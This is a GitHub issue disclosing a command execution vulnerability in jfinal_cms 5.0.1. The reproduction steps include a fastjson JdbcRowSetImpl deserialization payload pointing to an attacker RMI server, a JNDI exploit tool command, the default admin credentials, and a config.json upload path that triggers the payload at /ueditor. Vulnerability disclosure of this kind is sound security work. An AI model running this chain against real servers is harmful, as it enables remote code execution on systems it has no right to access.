jflyfox / jfinal_cms

jfinal cms是一个java开发的功能强大的信息咨询网站,采用了简洁强大的JFinal作为web框架,模板引擎用的是beetl,数据库用mysql,前端bootstrap框架。支持oauth2认证、帐号注册、密码加密、评论及回复,消息提示,网站访问量统计,文章评论数和浏览量统计,回复管理,支持权限管理。后台模块包含:栏目管理,栏目公告,栏目滚动图片,文章管理,回复管理,意见反馈,我的相册,相册管理,图片管理,专辑管理、视频管理、缓存更新,友情链接,访问统计,联系人管理,模板管理,组织机构管理,用户管理,角色管理,菜单管理,数据字典管理。
http://mtg.jflyfox.com/
Apache License 2.0
628 stars 285 forks source link

Administrator Interface Command Execution Vulnerability #28

Open sp4zcmd opened 3 years ago

sp4zcmd commented 3 years ago

Vulnerability summary

A command execution vulnerability exists in jfinal_cms 5.0.1

JDK version requirements:

jfinal_cms version:5.0.1

fastjson version:1.2.28 image

vulnerability recurrence

JDK version used in the test: JDK8u101

Run the tool on kali, start rmi and ldap services

https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

image

replace rmi or ldap address in payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

Create the config.json file and copy the payload in

image

Log in to the Backstage management system, select template management

default password:admin/admin123

image

Click config.json image

Click Replace file

image

Replace with the config.json file containing the payload just created image

Visit /ueditor, execute the command to pop up the calculator

http://localhost:8080/jfinal_cms/ueditor

2-163386968657022

Vulnerability analysis

com.jflyfox.component.controller.Ueditor

The ActionEnter class is instantiated in the index method of the /ueditor route image

com.baidu.ueditor.ActionEnter#ActionEnter

The ConfigManager class is instantiated in the constructor of the ActionEnter class image

com.baidu.ueditor.ConfigManager#ConfigManager

The construction method of ConfigManager calls initEnv() image

com.baidu.ueditor.ConfigManager#initEnv

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload. image

com.baidu.ueditor.ConfigManager

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization image image